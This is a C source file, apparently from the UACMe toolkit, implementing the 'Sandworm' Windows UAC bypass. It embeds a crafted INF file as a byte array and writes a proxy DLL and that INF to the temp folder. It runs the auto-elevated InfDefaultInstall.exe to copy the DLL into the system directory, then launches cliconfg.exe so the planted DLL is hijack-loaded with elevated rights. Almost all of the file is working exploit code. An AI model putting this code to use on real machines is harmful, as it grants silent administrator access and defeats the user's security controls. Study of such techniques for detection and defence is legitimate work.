/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: SANDWORM.C
*
* VERSION: 2.70
*
* DATE: 25 Mar 2017
*
* Sandworm method.
*
* Used as part of an exploit which is linked with the rumored "russian hackers".
* - Вы говорите по-русски?
* - Yes I can!
*
* Originally it was on the list to include in the first UACMe releases but was considered
* way too out-of-date and unavailable on anything other than Windows 7 and Windows 8.
* However, since the Vault7 release this method popped up in mind again, thanks to CIA.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
g_SandwormInf

; 61883.INF
; Copyright (c) Microsoft Corporation. All rights reserved.

[Version]
Signature="$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11D2-B4C2-00A0C9697D07}
Provider=%Msft%
DriverVer=16/21/2006,6.1.7600.16385

[DestinationDirs]
DefaultDestDir = 11

[DefaultInstall]
CopyFiles=@ntwdblib.dll
*/
/*
 * Bytes of the INF quoted above, exactly as written to disk: 319 bytes with CRLF
 * line endings and no terminating NUL (the array is sized to the payload, so
 * sizeof(g_SandwormInf) is the file length handed to supWriteBufferToFile).
 * "DefaultDestDir = 11" is the DIRID of the system directory; the CopyFiles entry
 * names ntwdblib.dll, which is the file InfDefaultInstall.exe copies there.
 */
static const unsigned char g_SandwormInf[319] = {
0x3B, 0x20, 0x36, 0x31, 0x38, 0x38, 0x33, 0x2E, 0x49, 0x4E, 0x46, 0x0D, 0x0A, 0x3B, 0x20, 0x43,
0x6F, 0x70, 0x79, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x28, 0x63, 0x29, 0x20, 0x4D, 0x69, 0x63,
0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69,
0x6F, 0x6E, 0x2E, 0x20, 0x20, 0x41, 0x6C, 0x6C, 0x20, 0x72, 0x69, 0x67, 0x68, 0x74, 0x73, 0x20,
0x72, 0x65, 0x73, 0x65, 0x72, 0x76, 0x65, 0x64, 0x2E, 0x0D, 0x0A, 0x0D, 0x0A, 0x5B, 0x56, 0x65,
0x72, 0x73, 0x69, 0x6F, 0x6E, 0x5D, 0x0D, 0x0A, 0x53, 0x69, 0x67, 0x6E, 0x61, 0x74, 0x75, 0x72,
0x65, 0x3D, 0x22, 0x24, 0x43, 0x48, 0x49, 0x43, 0x41, 0x47, 0x4F, 0x24, 0x22, 0x0D, 0x0A, 0x43,
0x6C, 0x61, 0x73, 0x73, 0x3D, 0x36, 0x31, 0x38, 0x38, 0x33, 0x0D, 0x0A, 0x43, 0x6C, 0x61, 0x73,
0x73, 0x47, 0x75, 0x69, 0x64, 0x3D, 0x7B, 0x37, 0x45, 0x42, 0x45, 0x46, 0x42, 0x43, 0x30, 0x2D,
0x33, 0x32, 0x30, 0x30, 0x2D, 0x31, 0x31, 0x44, 0x32, 0x2D, 0x42, 0x34, 0x43, 0x32, 0x2D, 0x30,
0x30, 0x41, 0x30, 0x43, 0x39, 0x36, 0x39, 0x37, 0x44, 0x30, 0x37, 0x7D, 0x0D, 0x0A, 0x50, 0x72,
0x6F, 0x76, 0x69, 0x64, 0x65, 0x72, 0x3D, 0x25, 0x4D, 0x73, 0x66, 0x74, 0x25, 0x0D, 0x0A, 0x44,
0x72, 0x69, 0x76, 0x65, 0x72, 0x56, 0x65, 0x72, 0x3D, 0x31, 0x36, 0x2F, 0x32, 0x31, 0x2F, 0x32,
0x30, 0x30, 0x36, 0x2C, 0x36, 0x2E, 0x31, 0x2E, 0x37, 0x36, 0x30, 0x30, 0x2E, 0x31, 0x36, 0x33,
0x38, 0x35, 0x0D, 0x0A, 0x0D, 0x0A, 0x5B, 0x44, 0x65, 0x73, 0x74, 0x69, 0x6E, 0x61, 0x74, 0x69,
0x6F, 0x6E, 0x44, 0x69, 0x72, 0x73, 0x5D, 0x0D, 0x0A, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74,
0x44, 0x65, 0x73, 0x74, 0x44, 0x69, 0x72, 0x20, 0x3D, 0x20, 0x31, 0x31, 0x0D, 0x0A, 0x0D, 0x0A,
0x5B, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x49, 0x6E, 0x73, 0x74, 0x61, 0x6C, 0x6C, 0x5D,
0x0D, 0x0A, 0x43, 0x6F, 0x70, 0x79, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x3D, 0x40, 0x6E, 0x74, 0x77,
0x64, 0x62, 0x6C, 0x69, 0x62, 0x2E, 0x64, 0x6C, 0x6C, 0x0D, 0x0A, 0x0D, 0x0A, 0x0D, 0x0A
};
/*
* ucmSandwormMethod
*
* Purpose:
*
* Bypass UAC through the whitelisted (auto-elevated) InfDefaultInstall.exe.
* The original Sandworm exploit used it to write to HKLM; here its CopyFiles
* step is what plants a dll where cliconfg.exe will pick it up (dll hijack).
*
* Parameters:
*
* ProxyDll, ProxyDllSize - in-memory image written to disk as NTWDBLIB_DLL in
* g_ctx.szTempDirectory. Neither value is validated here; that is left to the caller.
*
* Return:
*
* TRUE only when supRunProcess reports the cliconfg.exe launch as successful.
* Whether the planted dll was actually loaded is not checked by this function.
*
* Side effects / on-disk artifacts:
*
* - NTWDBLIB_DLL and PACKAGE_INF are created in the temp directory and deleted
* (best effort, DeleteFile result ignored) before returning, on every path.
* - InfDefaultInstall.exe is launched with the temp-dir inf as its argument,
* then cliconfg.exe from g_ctx.szSystemDirectory with no argument.
* - Anything InfDefaultInstall.exe copied into the system directory is not
* removed here.
*
*/
BOOL ucmSandwormMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOL bResult = FALSE;
    WCHAR szPayloadDll[MAX_PATH * 2];
    WCHAR szInstallInf[MAX_PATH * 2];
    WCHAR szProcessBuf[MAX_PATH * 2];

    //
    // Both temp-file paths start out empty so the cleanup at the end can tell
    // which of them was ever built. szProcessBuf is cleared before each use.
    //
    RtlSecureZeroMemory(szPayloadDll, sizeof(szPayloadDll));
    RtlSecureZeroMemory(szInstallInf, sizeof(szInstallInf));

    //
    // Stage 1: proxy dll into the temp directory.
    //
    _strcpy(szPayloadDll, g_ctx.szTempDirectory);
    _strcat(szPayloadDll, NTWDBLIB_DLL);
    if (!supWriteBufferToFile(szPayloadDll, ProxyDll, ProxyDllSize)) {
        goto Cleanup;
    }

    //
    // Stage 2: installation inf next to it. szInstallInf is only built once
    // stage 1 succeeded, so it stays empty (and is skipped by cleanup) otherwise.
    //
    _strcpy(szInstallInf, g_ctx.szTempDirectory);
    _strcat(szInstallInf, PACKAGE_INF);
    if (!supWriteBufferToFile(szInstallInf, (PVOID)g_SandwormInf, sizeof(g_SandwormInf))) {
        goto Cleanup;
    }

    //
    // Stage 3: let infdefaultinstall.exe process the inf; its CopyFiles
    // entry is what moves the payload dll.
    //
    RtlSecureZeroMemory(szProcessBuf, sizeof(szProcessBuf));
    _strcpy(szProcessBuf, g_ctx.szSystemDirectory);
    _strcat(szProcessBuf, INFDEFAULTINSTALL_EXE);
    if (!supRunProcess(szProcessBuf, szInstallInf)) {
        goto Cleanup;
    }

    //
    // Stage 4: launch the target executable. Its launch result is the
    // method's result.
    //
    RtlSecureZeroMemory(szProcessBuf, sizeof(szProcessBuf));
    _strcpy(szProcessBuf, g_ctx.szSystemDirectory);
    _strcat(szProcessBuf, CLICONFG_EXE);
    bResult = supRunProcess(szProcessBuf, NULL);

Cleanup:
    //
    // Remove only the temp-dir files this function created. DeleteFile
    // failures are ignored: the inf may never have been written if stage 2
    // failed, and the dll may be gone already.
    //
    if (szInstallInf[0] != 0) {
        DeleteFile(szInstallInf);
    }
    if (szPayloadDll[0] != 0) {
        DeleteFile(szPayloadDll);
    }

    return bResult;
}